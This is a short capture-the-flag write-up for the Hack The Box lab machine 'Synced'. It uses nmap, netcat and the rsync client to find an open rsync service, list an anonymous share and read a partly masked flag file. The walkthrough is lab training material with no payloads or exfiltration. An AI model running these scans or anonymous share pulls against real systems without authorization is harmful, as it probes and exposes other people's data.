HTB Synced

Today we return with a new of the very easy HTB boxes to try to finish them all.

$ nmap -v -p- 10.129.228.37 --min-rate 5000

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 11:01 CET
Initiating Ping Scan at 11:01
Scanning 10.129.228.37 [2 ports]
Completed Ping Scan at 11:01, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:01
Completed Parallel DNS resolution of 1 host. at 11:01, 0.03s elapsed
Initiating Connect Scan at 11:01
Scanning 10.129.228.37 [65535 ports]
...
Discovered open port 873/tcp on 10.129.228.37
...
PORT    STATE SERVICE
873/tcp open  rsync

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 35.09 seconds

Rsync port is 873/tcp
Let’s see which version rsync is using…

$ nmap -v -p873 -sV 10.129.228.37 --min-rate 5000

Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-04 11:04 CET
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 11:04
Scanning 10.129.228.37 [2 ports]
...
Nmap scan report for 10.129.228.37
Host is up (0.13s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds

Another option:

$ nc -vn 10.129.228.37 873

Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Connected to 10.129.228.37:873.
@RSYNCD: 31.0

Rsync protocol is version 31.

From Linux, we can interact with rsync with the tool rsync.

$ rsync --help

rsync  version 3.2.6  protocol version 31
Copyright (C) 1996-2022 by Andrew Tridgell, Wayne Davison, and others.
Web site: https://rsync.samba.org/
Capabilities:
    64-bit files, 64-bit inums, 64-bit timestamps, 64-bit long ints,
    socketpairs, symlinks, symtimes, hardlinks, hardlink-specials,
    hardlink-symlinks, IPv6, atimes, batchfiles, inplace, append, ACLs,
    xattrs, optional secluded-args, iconv, prealloc, stop-at, no crtimes
Optimizations:
    no SIMD-roll, no asm-roll, openssl-crypto, no asm-MD5
Checksum list:
    xxh128 xxh3 xxh64 (xxhash) md5 md4 none
Compress list:
    zstd lz4 zlibx zlib none

rsync comes with ABSOLUTELY NO WARRANTY.  This is free software, and you
are welcome to redistribute it under certain conditions.  See the GNU
General Public Licence for details.

rsync is a file transfer program capable of efficient remote update
via a fast differencing algorithm.
...

$ rsync rsync://10.129.228.37

public         	Anonymous Share

This rsync can be accessed anonymously and no credentials are needed to access the public folder.

$ rsync rsync://10.129.228.37/public

drwxr-xr-x          4.096 2022/10/25 00:02:23 .
-rw-r--r--             33 2022/10/24 23:32:03 flag.txt

Using –list-only rsync will just list the files instead of copying them.

$ cat flag.txt

72eaXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *